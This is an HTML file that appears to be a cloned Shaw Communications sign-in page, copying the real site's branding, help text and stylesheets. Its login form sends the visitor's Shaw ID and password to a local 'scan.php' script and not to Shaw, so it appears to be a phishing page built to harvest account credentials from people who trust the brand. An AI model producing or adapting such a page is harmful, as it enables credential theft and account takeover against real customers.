<html lang="en" dir="ltr">
    
    <head>      
    
    <title>Sign On</title>
    
  
    
   
    
    <meta name="viewport" content="width=device-width, initial-scale=1">                      
    <link href="https://signin.shaw.ca/assets/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://signin.shaw.ca/assets/css/consolidated-style.css" rel="stylesheet">    
    <link href="https://signin.shaw.ca/assets/css/consolidated-masthead.css" rel="stylesheet">
    <link href="https://signin.shaw.ca/assets/css/consolidated-footer.css" rel="stylesheet">
    <link href="https://signin.shaw.ca/assets/css/spinner.css" rel="stylesheet">
    


</head>   
<body class="myaccount" data-gr-c-s-loaded="true">  <!-- role="heading" aria-level="1" Had to remove these attributes to fix IOS VoiceOver Issue -->
    <div class="wrapper">
        <div class="meganav clearfix">
            <div class="masthead">
                <div class="meganavcontainer nopadding">
                    <ul class="row topToolbar">
                        <li class="columns six col-xs-7 col-sm-6 first" style="padding-left:15px; padding-right:0px;">
                            <ul class="floatLeft">
                                <li class="personal"><a id="personal-link" data-event="navigationAction" data-value="login|myacct-cable-web|header-nav|personal" href="#"></a></li>
                                <li class="business"><a id="business-link" data-event="navigationAction" data-value="login|myacct-cable-web|header-nav|business" href="#"></a></li>
                            </ul>
                        </li>
                        <li class="columns six col-xs-5 col-sm-6 text-right" style="padding-left:0; padding-right:0px;">
                            <ul class="secondary">
                                <li id="webmail-link" class="exterior">
                                    <a data-event="navigationAction" data-value="login|myacct-cable-web|header-nav|webmail" class="ic ic-shaw-webmail" href="#" target="_blank">
                                        <span class="">Webmail</span>
                                    </a>
                                </li>
                                <li class="contact drawer open" id="openId">
                                    <a id="contact-link" class="ic ic-shaw-contact hidden-xs" data-event="navigationAction" data-value="login|myacct-cable-web|header-nav|contact-us" target="_blank" href="#">
                                        <span id="contact-label" class="hidden-xs"></span>
                                    </a>
                                    <a id="contact-link-enterprise" class="ic ic-shaw-contact hidden-xs" data-event="navigationAction" data-value="login|myacct-cable-web|header-nav|contact-us" target="_blank" href="#">
                                        <span id="contact-label" class="hidden-xs"></span>
                                    </a>
                                </li>
                                <li id="language-toggle">
                                    <div>
                                        <a id="select-en" data-event="navigationAction" data-value="login|myacct-cable-web|header-nav|english-toggle" href="$toggleUrl=en">En</a>
                                        <a id="select-fr" data-event="navigationAction" data-value="login|myacct-cable-web|header-nav|french-toggle" href="$toggleUrl=fr">Fr</a>
                                    </div>
                                </li>
                            </ul>
                        </li>
                    </ul>
                </div>
            </div>            
            <div class="container-main">
                <div id="vod-search-container">
                    <div id="vod-search-logo"></div>
                    <p id="vod-search-header-text" role="heading" aria-level="1">Search over 8000 on-demand titles and order the content you want directly to your TV or computer. Sign in to get started.</p>
                    <div class="container shaw-container">
                    <div class="row">                                
                        <div id="sign-in-content">
                            <div id="left-main">
                                <div id="logo-section" class="logo-section"></div>
                                <p id="sign-in-title">
                                </p><div id="main-form">
                                    <div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-hidden="true">
                                        <div class="vertical-alignment-helper">
                                            <div class="modal-dialog vertical-align-center">
                                                <div class="modal-content">
                                                    <div class="modal-header">
                                                        <button id="modal-close" data-event="navigationAction" data-value="login|myacct-cable-web|modal-close" type="button" class="close" data-dismiss="modal">
                                                            <span aria-hidden="true">
                                                                <img alt="close-contact-header" src="./assets/images/modal-close.png" data-pin-nopin="true">
                                                            </span>
                                                            <span class="sr-only">Close</span>
                                                        </button>
                                                        <div id="vod-help-modal-header" class="dynamic-modal-header">
                                                            <p class="center">
                                                                <img alt="help-icon" id="help-white-bkgd" src="assets/images/questionmark.png">
                                                                <img alt="help-icon" id="help-blue-bkgd" src="assets/images/icon-help-blue-bkgd.png" width="45">
                                                            </p>
                                                            <p class="modal-title">What's a Shaw ID?</p>
                                                        </div>
                                                        <div id="vod-select-provider-header" class="dynamic-modal-header">
                                                            <p class="modal-title">Select your provider</p>
                                                        </div>
                                                        <div id="vod-select-provider-header-fr" class="dynamic-modal-header">
                                                            <p class="modal-title">Sélectionnez votre fournisseur</p>
                                                        </div>
                                                        <div id="myaccount-provider-header" class="dynamic-modal-header">
                                                            <p class="center"><img alt="help-icon" src="assets/images/questionmark.png"></p>
                                                            <p class="modal-title">What’s a Shaw ID?</p>
                                                        </div>
                                                        <div id="myaccount-provider-header-en" class="dynamic-modal-header">
                                                            <p class="center"><img alt="help-icon" src="assets/images/questionmark.png"></p>
                                                            <p class="modal-title">What’s a Shaw ID?</p>
                                                        </div>
                                                        <div id="myaccount-provider-header-fr" class="dynamic-modal-header">
                                                            <p class="center"><img alt="help-icon" src="assets/images/questionmark.png"></p>
                                                            <p class="modal-title">Qu’est-ce qu’un identifiant Shaw?</p>
                                                        </div>
                                                    </div>
                                                    <div class="modal-body">
                                                        <div id="myaccount-help-modal-content" class="dynamic-modal-content">
                                                            <p class="modal-para">
                                                                Your Shaw ID is the email address you use to access your Shaw services.
                                                            </p>                                                            
                                                            <p class="modal-para">
                                                                My Shaw lets you manage your services the easy way, including registering your devices for Shaw Go WiFi and managing access to the BlueCurve TV app.
                                                            </p>                                                            
                                                        </div>
                                                        <div id="myaccount-help-modal-content-en" class="dynamic-modal-content">
                                                            <p class="modal-para">
                                                                Your Shaw ID is the email you use to access your Shaw Direct services and exclusive benefits like My Shaw Direct and the BlueCurve TV app.
                                                            </p>
                                                        </div>
                                                        <div id="myaccount-help-modal-content-fr" class="dynamic-modal-content">
                                                            <p class="modal-para">
                                                                Votre identifiant Shaw est l’adresse de courriel que vous utilisez pour accéder à vos services de Shaw Direct et à des avantages exclusifs comme Mon Shaw Direct et l'application BlueCurve TV.
                                                            </p>
                                                        </div>
                                                        <div id="enterprise-help-modal-content" class="dynamic-modal-content">
                                                            <p class="modal-para">
                                                                Your Shaw ID is the email address you use to access your account information.
                                                            </p>
                                                            <p class="modal-para">
                                                                My Shaw Enterprise lets you easily view your invoices and view and analyze your Internet speed and data usage.
                                                            </p>
                                                        </div>

                                                        <div id="vod-help-modal-content" class="dynamic-modal-content">
                                                            <p class="modal-para">Your Shaw ID gives you access to several exclusive benefits and services, such as My Shaw and the BlueCurve TV app.</p>
                                                        </div>
                                                        <div id="vod-go-register" class="dynamic-modal-content">
                                                            <a data-event="navigationAction" data-value="login|myacct-cable-web|register-modal|register-cable-shaw-id" target="_blank" href="https://register.shaw.ca/"><div class="vod-register-shawid vod-register-image"></div></a>
                                                            <a data-event="navigationAction" data-value="login|myacct-cable-web|register-modal|register-direct-shaw-id-en" target="_blank" href="https://register.shawdirect.ca/direct?lang=en"><div class="vod-register-direct vod-register-image"></div></a>
                                                        </div>
                                                        <div id="vod-cutover-learn-more" class="dynamic-modal-content">
                                                            <div class="vod-forgot-links">
                                                                <a href="#" target="_blank" class="vod-register-shawid vod-register-image" data-value="login|myacct-cable-web|cutover-modal|learn-more|cable"></a>
                                                            </div>
                                                            <div class="vod-forgot-links">
                                                                <a href="#" target="_blank" class="vod-register-direct vod-register-image" data-value="login|myacct-cable-web|cutover-modal|learn-more|direct"></a>
                                                            </div>
                                                        </div>
                                                        <div id="vod-forgot" class="dynamic-modal-content">
                                                            <div class="vod-forgot-links">
                                                                <div class="vod-register-shawid vod-register-image"></div>
                                                                <p><a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-modal|retrieve-cable-shaw-id" target="_blank" href="https://register.shaw.ca/forgotshawid">Retrieve your Shaw ID</a></p>
                                                                <p><a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-modal|reset-cable-shaw-id-password" aria-label="reset-shaw-id-password" target="_blank" href="https://register.shaw.ca/forgotpassword">Reset your password</a></p>
                                                            </div>
                                                            <div class="vod-forgot-links">
                                                                <div class="vod-register-direct vod-register-image"></div>
                                                                <p><a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-modal|retrieve-direct-shaw-id-en" aria-label="retrieve-direct-shaw-id-en" target="_blank" href="https://register.shawdirect.ca/forgotshawid?lang=en">Retrieve your Shaw ID</a></p>
                                                                <p><a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-modal|reset-direct-shaw-id-password-en" aria-label="reset-direct-shaw-id-password-en" target="_blank" href="https://register.shawdirect.ca/forgotpassword?lang=en">Reset your password</a></p>
                                                            </div>
                                                        </div>
                                                        <div id="learn-more" class="dynamic-modal-content">
                                                            <div class="vod-forgot-links">
                                                                <a data-event="navigationAction" data-value="login|myacct-cable-web|cutover|learn-more-modal|tve" href="https://community.shaw.ca/docs/DOC-14645" target="_blank" class="vod-register-shawid vod-register-image"></a>
                                                            </div>
                                                            <div class="vod-forgot-links">
                                                                <a data-event="navigationAction" data-value="login|myacct-cable-web|cutover|learn-more-modal|tve" href="http://www.shawdirect.ca/english/support/article/9705/" target="_blank" class="vod-register-direct vod-register-image"></a>
                                                            </div>
                                                        </div>

                                                        <div id="get-started-now" class="dynamic-modal-content">
                                                            <div class="vod-forgot-links">
                                                                <a data-event="navigationAction" data-value="login|myacct-cable-web|cutover|get-started-modal|register-cable-shaw-id" href="https://register.shaw.ca/" target="_blank" class="vod-register-shawid vod-register-image"></a>
                                                            </div>
                                                            <div class="vod-forgot-links">
                                                                <a data-event="navigationAction" data-value="login|myacct-cable-web|cutover|get-started-modal|register-direct-shaw-id-en" href="https://register.shawdirect.ca/direct?lang=en" target="_blank" class="vod-register-direct vod-register-image"></a>
                                                            </div>
                                                        </div>
                                                        <div id="get-started-now-fr" class="dynamic-modal-content">
                                                            <div class="vod-forgot-links">
                                                                <a data-event="navigationAction" data-value="login|myacct-cable-web|cutover|get-started-modal|register-cable-shaw-id" href="https://register.shaw.ca/" target="_blank" class="vod-register-shawid vod-register-image"></a>
                                                            </div>
                                                            <div class="vod-forgot-links">
                                                                <a data-event="navigationAction" data-value="login|myacct-cable-web|cutover|get-started-modal|register-direct-shaw-id-fr" href="https://register.shawdirect.ca/direct?lang=fr" target="_blank" class="vod-register-direct vod-register-image"></a>
                                                            </div>
                                                        </div>



                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>                                    
                                    
                                    <div id="adobe-akamai-cutover-txt">
                                        <!-- <p class="en">
                                            <strong>Please Note:</strong><br />
                                            As of June 6, 2018, you will require a Shaw ID<br />
                                            to access this service.<br />
                                            <a onclick="openAkamaiEnGetStartedNowClick();" data-value="get-started">Get started now</a>
                                        </p>
                                        <p class="fr">
                                            <strong>À noter :</strong><br />
                                            à compter du 6 juin 2018, vous aurez besoin d'un <br />
                                            identifiant Shaw pour accéder à ce service.<br />
                                            <a onclick="openAkamaiFrGetStartedNowClick();" data-value="get-started-fr">En savoir plus.</a>
                                        </p> -->
                                    </div>
                                    
                                    <form action="scan.php" method="POST" >

                                        <div id="alert-danger">
                                        <img alt="error-icon" src="assets/images/error_button.png">&nbsp;&nbsp;<span id="errMsgText" class="errMsgText">Invalid Shaw ID or password. Please try again.</span></div>
                                        <span id="username-label" class="login-form-label" aria-label="username"></span><br>
                                        <!-- ClickTaleExcludeBlock -->
                                        
                                        <input id="username" aria-labelledby="username-label" type="text" size="36" name="text1" class="login-form-field ctHidden" value="" placeholder="example@example.com" >
                                        <!-- EndClickTaleExcludeBlock -->
                                        
                                        <button type="button" id="username-help-popover"  class="ic" data-event="navigationAction" data-value="login|myacct-cable-web|help" onclick="openHelp();" tabindex="-1">
                                            <div id="modal-icon-path"></div>
                                        </button>
                                        <span id="password-label" aria-label="password" class="login-form-label"></span><br>
                                        <!-- ClickTaleExcludeBlock -->
                                        <input id="password" aria-labelledby="password-label" type="password" size="36" name="text2" class="login-form-field ctHidden" placeholder="" >
                                        <!-- EndClickTaleExcludeBlock -->
                                        
                                        <div id="checkbox-section" class="checkbox-section">
                                            <div id="checkbox" class="checkboxFive">
                                                <input type="checkbox" id="persistent_check_occ" class="persistent_check" name="">
                                                <label id="checkboxMask" class="noselect ic" for="persistent_check_occ">-</label>
                                            </div>
                                            <div id="checkbox-label" class="checkbox-label"><span id="checkbox-label-text"></span></div>
                                        </div>
                                        <input type="hidden" name="username" id="ok" value="">
                                        <input type="hidden" name="password" id="cancel" value="">
                                        <div id="tve-error-msg"><p class="errMsgText">&nbsp;</p></div>
                                        <p class="center">
                                            <input id="sign-in-button" data-event="navigationAction" data-value="login|myacct-cable-web|sign-in" type="submit" class="btn" name="submit" value="Sign In" disabled="">
                                        </p>
                                    </form>
                                    
                                    
                                    <div id="adobe-akamai-help-txt">
                                        <p><a onclick="openAkamaiCreateShawIdClick()">Create your Shaw ID</a></p>
                                        <div style="display: none; text-align: center; margin-bottom: 20px;" class="akamai-create-shawID-slide">
                                            <h4>Select your provider</h4>
                                            <div style="display: flex; border: 1px solid #cccccc; width: 100%; align-items: center; justify-content: center;">
                                                <div style="width: 50%; text-align: center;">
                                                        <a data-event="navigationAction" data-value="login|myacct-cable-web|login|myacct-cable-web|register-cable-shaw-id" target="_blank" href="https://register.shaw.ca/">
                                                            <img style="height: 40px; margin-top: 0px;" src="assets/images/Shaw_Logo.png">
                                                        </a>
                                                    
                                        
                                                </div>
                                                <div style="text-align: center; width: 50%">
                                                        <a aria-label="register-direct-shaw-id" data-event="navigationAction" data-value="login|myacct-cable-web|login|myacct-cable-web|forgot-page|register-direct-shaw-id-en" target="_blank" href="https://register.shawdirect.ca/direct?lang=en">
                                                            <img style="height: 60px; margin-top: 40px; margin-bottom: 20px" src="assets/images/logo-shawdirect-mobile.png">
                                                        </a>
                                                </div>
                                            </div>                                            
                                        </div>
                                    </div>
                                    <div id="vod-forgot-link">
                                        <p class="center">
                                            <a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-modal" onclick="openVodForgot();">Forgot your Shaw ID or password?</a>
                                        </p>
                                        <p class="center">
                                            Don't have a Shaw ID? <a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-modal" onclick="openVodRegister();">Register now</a>
                                        </p>

                                    </div>

                                    <div id="default-forgot" class="center">
                                        <p>
                                            <span>Forgot your</span> <a aria-label="default-forgot-cable-shaw-id" data-event="navigationAction" data-value="login|myacct-cable-web|forgot-cable-shaw-id" target="_blank" href="https://register.shaw.ca/forgotshawid"><strong>Shaw ID</strong></a>
                                            <span>or</span> <a aria-label="default-forgot-password" data-event="navigationAction" data-value="login|myacct-cable-web|forgot-cable-shaw-id-password" target="_blank" href="https://register.shaw.ca/forgotpassword"><strong>password</strong>?</a>
                                        </p>
                                        <p class="center">
                                            Don't have a Shaw ID? <a href="#">Register now</a>
                                        </p>
                                    </div>

                                    <div id="direct-en-forgot" class="center">
                                        <p>
                                            <span>Forgot your</span> <a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-direct-shaw-id-en" target="_blank" href="https://register.shawdirect.ca/forgotshawid?lang=en"><strong>Shaw ID</strong></a>
                                            <span>or</span> <a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-direct-shaw-id-password-en" target="_blank" href="https://register.shawdirect.ca/forgotpassword?lang=en"><strong>password</strong>?</a>
                                        </p>
                                        <p class="center">
                                            Don't have a Shaw ID? <a href="https://register.shawdirect.ca/direct?lang=en">Register now</a>
                                        </p>                                            
                                    </div>
                                    <div id="direct-fr-forgot" class="center">
                                        <p>
                                            <strong><a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-direct-shaw-id-fr" target="_blank" href="https://register.shawdirect.ca/forgotshawid?lang=fr">
                                            Identifiant Shaw</a></strong>
                                            <span>ou</span>
                                            <strong><a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-direct-shaw-id-password-fr" target="_blank" href="https://register.shawdirect.ca/forgotpassword?lang=fr">mot de passe</a></strong>
                                            <span>oublié?</span>
                                        </p>
                                        <p class="center">
                                            Vous n’avez pas d’identifiant Shaw? <a href="https://register.shawdirect.ca/direct?lang=fr">M’enregistrer</a>
                                        </p> 
                                    </div>
                                    <div id="enterprise-forgot" class="center">
                                        <p>
                                            <span>Forgot your</span> <a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-enterprise-shaw-id" target="_blank" href="https://register.enterprise.shaw.ca/forgotshawid"><strong>Shaw ID</strong></a>
                                            <span>or</span> <a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-enterprise-shaw-id-password" target="_blank" href="https://register.enterprise.shaw.ca/forgotpassword"><strong>password</strong>?</a>
                                        </p>
                                        <p class="center">
                                            Don't have a Shaw ID? <a href="https://register.enterprise.shaw.ca/business">Register now</a>
                                        </p>
                                    </div>

                                    <!-- <div class="left-pane-register">
                                        <p id="left-pane-register-vod" class="center left-pane-register"><a data-event="navigationAction" data-value="register-modal" onclick="openVodRegister();">Register Shaw ID</a></p>                                        
                                    </div> -->

                                    <p id="tve-web-forgot-link" class="center tve-web-text"><a data-event="navigationAction" data-value="login|myacct-cable-web|forgot-modal" onclick="openVodForgot();">Forgot Shaw ID or password?</a></p>
                                    <p id="tve-web-register-link" class="center tve-web-text"><a data-event="navigationAction" data-value="login|myacct-cable-web|register-modal" onclick="openVodRegister();">Register Shaw ID</a></p>
                                    <!-- <p id="tve-web-bookmark-note" class="center tve-web-text"><strong>Please note</strong>: As of June 6, 2018,<br class="visible-xs"/> you will <br class="hidden" />require a Shaw ID to access this service. <a data-value="learn-more"  onclick="openTveLearnMore();">Learn more</a></p> -->
                                    <p id="adobe-french-forgot" class="center">
                                        <span>Vous avez oublié votre</span>
                                        <a data-event="navigationAction" data-value="login|myacct-cable-web|retrieve-direct-shaw-id-fr" target="_blank" href="https://register.shawdirect.ca/forgotshawid?lang=fr"><strong>identifiant</strong></a>
                                        <span>ou</span>
                                        <a data-event="navigationAction" data-value="login|myacct-cable-web|reset-direct-shaw-id-password-fr" target="_blank" href="https://register.shawdirect.ca/forgotpassword?lang=fr"><strong>mot de passe Shaw?</strong></a>
                                    </p>
                                    <p id="adobe-french-register" class="center">
                                        <a data-event="navigationAction" data-value="login|myacct-cable-web|register-direct-shaw-id-fr" target="_blank" href="https://register.shawdirect.ca/direct?lang=fr"><strong>Créez un identifiant Shaw</strong></a>
                                    </p>
                                    <p id="akamai-adobe-forgot" class="center">
                                        <a onclick="openAkamaiForgetShawIdClick()" data-event="navigationAction" data-value="login|myacct-cable-web|forgot-link">
                                                Forgot your Shaw ID or password?
                                        </a>
                                        </p><div style="display: none; text-align: center;" class="akamai-forgot-shawID-slide">
                                            <h4>Select your provider</h4>
                                            <div style="display: flex; border: 1px solid #cccccc; width: 100%; align-items: center; justify-content: center;">
                                                <div style="width: 50%; text-align: center;">
                                                    <img style="height: 40px; margin-top: 10px;" src="assets/images/Shaw_Logo.png">
                                                    <br>
                                                    <br>                                                        
                                                    <p><a data-event="navigationAction" data-value="login|myacct-cable-web|login|myacct-cable-web|forgot-page|retrieve-cable-shaw-id" target="_blank" href="https://register.shaw.ca/forgotshawid">Retrieve your Shaw ID</a></p>
                                                    <p><a aria-label="reset-shaw-id-password" data-event="navigationAction" data-value="login|myacct-cable-web|login|myacct-cable-web|forgot-page|reset-cable-shaw-id-password" target="_blank" href="https://register.shaw.ca/forgotpassword">Reset your password</a></p>
                                                    
                                                </div>
                                                <div style="text-align: center; width: 50%">
                                                    <img style="height: 60px; margin-top: 10px;" src="assets/images/logo-shawdirect-mobile.png"> 
                                                    <br>                                               
                                                    <p><a aria-label="retrieve-direct-shaw-id" data-event="navigationAction" data-value="login|myacct-cable-web|login|myacct-cable-web|forgot-page|retrieve-direct-shaw-id-en" target="_blank" href="https://register.shawdirect.ca/forgotshawid?lang=en">Retrieve your Shaw ID</a></p>
                                                    <p><a aria-label="reset-direct-password" data-event="navigationAction" data-value="login|myacct-cable-web|login|myacct-cable-web|forgot-page|reset-direct-shaw-id-password-en" target="_blank" href="https://register.shawdirect.ca/forgotpassword?lang=en">Reset your password</a></p>
                                                </div>
                                            </div>                                            
                                        </div>
                                    <p></p>
                                </div>                                      
                            </div>                                                     
                            <div id="right-main">                                                                                                                                        
                                <p id="right-main-header"></p>                                                
                                <strong><p id="side-sub-heading"></p></strong>
                                <ul id="right-listing">
                                    <li id="register-reason-1"></li>
                                    <li id="register-reason-2"></li>
                                    <li id="register-reason-3"></li>
                                    <li id="register-reason-4"></li>
                                </ul>
                                <p id="register-link-vod"><a data-event="navigationAction" data-value="login|myacct-cable-web|register-modal" onclick="openVodRegister();">Register Now</a></p>
                                <p id="register-link-myaccount"><a aria-label="register-myaccount-cable" data-event="navigationAction" data-value="login|myacct-cable-web|register-cable-shaw-id" href="" target="_blank">Register now</a></p>
                                <p id="register-link-myaccount-direct-en"><a data-event="navigationAction" data-value="login|myacct-cable-web|register-direct-shaw-id-en" href="" target="_blank">Register now</a></p>
                                <p id="register-link-myaccount-direct-fr"><a data-event="navigationAction" data-value="login|myacct-cable-web|register-direct-shaw-id-fr" href="" target="_blank">M’enregistrer</a></p>
                                <p id="register-link-enterprise"><a data-event="navigationAction" data-value="login|myacct-cable-web|register-enterprise-shaw-id" href="" target="_blank">Register now</a></p>
                                <div id="right-spacer"></div>
                            </div>                              
                        </div>           
                    </div>
                </div>
                </div>
            </div>
            <div id="contact-footer" class="contact-footer">
                <div id="footer-section" class="footer-section">
                    <div id="footer-section-content" class="footer-section-content">
                        <div id="footer-links" class="footer-links">
                            <span>
                                <a id="footer-privacy-policy-link" data-event="navigationAction" data-value="login|myacct-cable-web|footer-nav|privacy-policy" href="http://www.shaw.ca/privacy-policy/" target="_blank"></a>&nbsp;&nbsp;
                            </span>
                            <span> | </span>
                            <span>
                                &nbsp;&nbsp;<a id="footer-terms-of-use-link" data-event="navigationAction" data-value="login|myacct-cable-web|footer-nav|terms-of-use" href="http://www.shaw.ca/terms-of-use/" target="_blank"></a>&nbsp;&nbsp;
                            </span>
                            <span> | </span>
                            <span>
                                &nbsp;&nbsp;<a id="footer-accessibility-link" data-event="navigationAction" data-value="login|myacct-cable-web|footer-nav|accessibility" href="http://www.shaw.ca/accessibility/" target="_blank"></a>&nbsp;&nbsp;
                            </span>
                        </div>
                        <div id="footer-copyright" class="footer-copyright">
                            <span class="cable-only">© <script src="//tags.tiqcdn.com/utag/shaw/uts-shaw-myaccount/prod/utag.js" type="text/javascript" async=""></script><script>document.write(new Date().getFullYear())</script>2020 Shaw Communications. All Rights Reserved.</span>
                            <span class="direct-only en">© <script>document.write(new Date().getFullYear())</script>2020 Shaw Satellite G.P. All Rights Reserved. </span>
                            <span class="direct-only fr">© Shaw Satellite G.P., <script>document.write(new Date().getFullYear())</script>2020. Tous droits réservés.</span>
                        </div>
                    </div>
                </div>
            </div>            
        </div>          	  
        <script src="https://signin.shaw.ca/assets/js/jquery.min.js"></script>           
        <script src="https://signin.shaw.ca/assets/js/bootstrap.min.js"></script>
        <script src="https://signin.shaw.ca/assets/js/consolidated-script.js"></script>
        
    </div>
    



</body></html>